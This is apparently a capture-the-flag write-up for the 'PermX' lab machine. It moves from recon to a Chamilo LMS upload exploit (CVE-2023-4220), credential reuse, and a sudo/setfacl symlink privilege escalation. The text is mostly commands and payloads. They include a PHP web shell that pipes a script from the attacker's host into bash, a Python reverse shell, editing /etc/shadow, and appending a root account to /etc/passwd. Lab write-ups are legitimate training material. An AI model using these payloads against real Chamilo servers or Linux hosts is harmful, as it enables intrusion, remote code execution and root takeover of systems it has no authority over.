TCP Scan

> TARGET=10.129.84.122 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAyYzjPGuVga97Y5vl5BajgMpjiGqUWp23U2DO9Kij5AhK3lyZFq/rroiDu7zYpMTCkFAk0fICBScfnuLHi6NOI=
|   256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP8A41tX6hHpQeDLNhKf2QuBM7kqwhIBXGZ4jiOsbYCI
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://permx.htb
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

• add hostname

echo '10.129.84.122  permx.htb' >> /etc/hosts

enum

> dirsearch -u http://permx.htb -x 403
[15:41:04] 301 -  303B  - /js  ->  http://permx.htb/js/
[15:41:20] 200 -    3KB - /404.html
[15:41:23] 200 -    4KB - /about.html
[15:41:54] 200 -    3KB - /contact.html
[15:41:55] 301 -  304B  - /css  ->  http://permx.htb/css/
[15:42:08] 301 -  304B  - /img  ->  http://permx.htb/img/
[15:42:12] 200 -  448B  - /js/
[15:42:13] 301 -  304B  - /lib  ->  http://permx.htb/lib/
[15:42:13] 200 -  491B  - /lib/
[15:42:13] 200 -  649B  - /LICENSE.txt

wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://permx.htb/" -H "Host: FUZZ.permx.htb" --hl 107
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   200        586 L    2466 W     36182 Ch    "www"
000000477:   200        352 L    940 W      19347 Ch    "lms"

> curl http://permx.htb/LICENSE.txt
 => FREE HTML TEMPLATE LICENSE BY HTML Codex

• http://lms.permx.htb/

Administrator : Davis Miller
Powered by Chamilo © 2024

foothold: CVE-2023-4220

• https://starlabs.sg/advisories/23/23-4220/

echo '<?php system("curl http://10.10.14.28/rev.sh|bash"); ?>' > test.php
curl -F 'bigUploadFile=@test.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/test.php'

# rev.sh
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

user

• /var/www/chamilo/app/config/configuration.php

$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
$_configuration['db_manager_enabled'] = false;

• login as mtz

> ssh mtz@permx.htb
mtz@permx:~$ cat user.txt
81e7de00461735b125c060e44aba3264
mtz@permx:~$

root

mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh

• /opt/acl.sh

#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

• exploit

mtz@permx:~$ ln -s / root
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow

# copy the hash of mtz and overwrite the root one
mtz@permx:~$ vi /etc/shadow

mtz@permx:~$ su root
Password:
root@permx:/home/mtz# cat /root/root.txt
e11798eccb1882d97016158f13ad02ad


or


# Generate password hash
> openssl passwd -1 -salt hacker pass123
# Add to /etc/passwd
> echo 'hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash' >> /etc/passwd

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack